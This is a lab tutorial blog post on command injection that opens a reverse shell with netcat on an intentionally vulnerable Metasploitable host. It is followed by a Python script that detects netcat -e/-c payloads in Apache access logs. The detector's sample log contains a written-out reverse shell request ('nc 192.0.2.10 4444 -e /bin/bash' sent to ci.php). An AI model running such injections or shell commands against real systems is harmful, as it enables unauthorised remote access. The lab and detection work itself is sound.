Thursday, April 12, 2018

Command Injection (II): Reverse shell connection with NetCat


- Layout for this exercise:





- This exercise is based on the previous one:

http://www.whitelist1.com/2018/04/command-injection-attack.html


- Now the goal is to perform a Command Injection attack from the web browser of the attacker (Kali Linux) against the victim (Metasploitable), injecting NetCat commands:

https://en.wikipedia.org/wiki/Netcat

Three of the most interesting characteristics of this attack are:

  • No file is uploaded to the victim, so the detection rate would be low
  • No write permission is needed on the web server folder on the victim's side
  • The tool (NetCat) is usually present on most Linux/Windows machines


- First, let's check that ci.php (which allows Command Injection due to lack of input sanitization, as seen in the previous exercise) is available in the web server folder /var/www on the victim Metasploitable:




- From Kali:















- NetCat (nc) has two options (-c and -e), considered dangerous by the program itself, that execute commands remotely:





- Setting a listening session on port 4444 on the attacker side:




- Now, through Kali's browser, entering the NetCat command that remotely executes (-e) a shell (/bin/bash):





- It is interesting to notice the Connecting notification, meaning the browser is waiting for the connection at the other side:






- Finally, the attacker Kali achieves a reverse shell connection from the Metasploitable victim's side:
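
Because no file is written on the victim, the web server's access log is one of the few places this attack leaves a trace. The following detection sketch is an added example, not part of the original exercise: it scans Apache access-log lines for query parameters that invoke nc with -e or -c. The log lines are constructed, and the parameter name cmd and the documentation-range IP addresses are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Client IP and request target of an Apache common/combined log entry.
REQUEST = re.compile(r'^(?P<ip>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')

# nc / ncat / netcat (or nc.traditional etc.) called with the -e or -c
# option, alone or inside a cluster such as -ve.
NC_EXEC = re.compile(r'\b(?:nc|ncat|netcat)(?:\.\w+)?\b[^|;&\n]*?\s-[A-Za-z]*[ec]\b')

# Constructed sample log. "cmd" is a hypothetical parameter name; the page
# does not say which parameter ci.php reads, so every parameter is checked.
SAMPLE_LOG = [
    '192.0.2.10 - - [12/Apr/2018:10:01:02 +0000] '
    '"GET /ci.php?cmd=127.0.0.1 HTTP/1.1" 200 412',
    '192.0.2.10 - - [12/Apr/2018:10:03:40 +0000] '
    '"GET /ci.php?cmd=nc+192.0.2.10+4444+-e+%2Fbin%2Fbash HTTP/1.1" 200 0',
    '192.0.2.11 - - [12/Apr/2018:10:04:00 +0000] '
    '"GET /index.php?q=nc+-zv+scan HTTP/1.1" 200 90',
]


def find_nc_exec(log_lines):
    """Return (client_ip, path, decoded_value) for each query parameter
    whose decoded value runs netcat with -e or -c."""
    hits = []
    for line in log_lines:
        m = REQUEST.match(line)
        if not m:
            continue  # not an access-log entry in the expected format
        url = urlsplit(m.group("target"))
        # parse_qsl percent-decodes values and turns '+' into a space,
        # so encoded payloads are matched in their decoded form.
        for _name, value in parse_qsl(url.query, keep_blank_values=True):
            if NC_EXEC.search(value):
                hits.append((m.group("ip"), url.path, value))
    return hits


if __name__ == "__main__":
    for ip, path, value in find_nc_exec(SAMPLE_LOG):
        print(f"ALERT {ip} {path}: {value}")
```

Access logs record only the URL, so a form that submits the value via POST needs the same check at the application or WAF layer.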